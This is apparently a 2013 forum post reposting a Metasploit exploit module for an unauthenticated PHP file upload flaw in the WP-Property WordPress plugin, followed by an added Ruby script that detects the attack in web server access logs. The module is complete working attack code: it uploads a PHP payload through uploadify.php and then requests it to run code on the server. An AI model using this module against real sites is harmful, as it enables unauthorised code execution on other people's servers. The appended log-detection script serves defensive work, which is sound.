WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it; I mean, it's msf.
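
Added example, not part of the original post or of the Metasploit project: a Ruby check that looks in web server access logs for the request sequence the module above generates, a POST to uploadify.php answered with 200 followed by a GET for a different PHP file in the same uploadify directory. The combined log format, the 300-second correlation window, the function names and the sample log lines are assumptions made for illustration.

```ruby
# Added example: flag the upload-then-execute sequence in access logs.
require 'time'

UPLOADIFY_DIR = %r{/wp-content/plugins/wp-property/third-party/uploadify/}
LOG_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /

# Constructed sample lines (combined log format), not taken from a real server.
SAMPLE_LOG = <<~LOG
  198.51.100.7 - - [04/Jan/2013:19:40:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.9 - - [04/Jan/2013:19:41:10 +0000] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"
  203.0.113.9 - - [04/Jan/2013:19:41:12 +0000] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71 "-" "-"
  203.0.113.9 - - [04/Jan/2013:19:41:13 +0000] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/QwErT.php HTTP/1.1" 200 0 "-" "-"
  198.51.100.7 - - [04/Jan/2013:19:45:00 +0000] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"
LOG

# Parse one combined-format line into a hash; returns nil for unparseable lines.
def parse_line(line)
  m = LOG_RE.match(line) or return nil
  path = m[4].split('?', 2).first
  { ip: m[1], time: Time.strptime(m[2], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[3], path: path, status: m[5].to_i }
end

# Returns findings: every successful POST to uploadify.php, and every request
# for another PHP file in that directory (correlated to a recent POST by IP).
def find_upload_abuse(log_text, window: 300)
  uploads = Hash.new { |h, k| h[k] = [] } # client IP => times of upload POSTs
  findings = []
  log_text.each_line do |line|
    e = parse_line(line.chomp) or next
    next unless e[:path] =~ UPLOADIFY_DIR
    file = File.basename(e[:path])
    if e[:method] == 'POST' && file == 'uploadify.php' && e[:status] == 200
      uploads[e[:ip]] << e[:time]
      findings << { type: :upload_post, ip: e[:ip], path: e[:path] }
    elsif file =~ /\.ph(p\d?|tml)\z/i && file != 'uploadify.php'
      recent = uploads[e[:ip]].any? { |t| (e[:time] - t).between?(0, window) }
      findings << { type: recent ? :upload_then_exec : :unexpected_php,
                    ip: e[:ip], path: e[:path] }
    end
  end
  findings
end

find_upload_abuse(SAMPLE_LOG).each { |f| puts f.inspect } if $PROGRAM_NAME == __FILE__
```

Because the module requests its payload with unlink_self, the uploaded file may no longer exist on disk by the time the host is examined, so the access log can be the only remaining trace of the sequence.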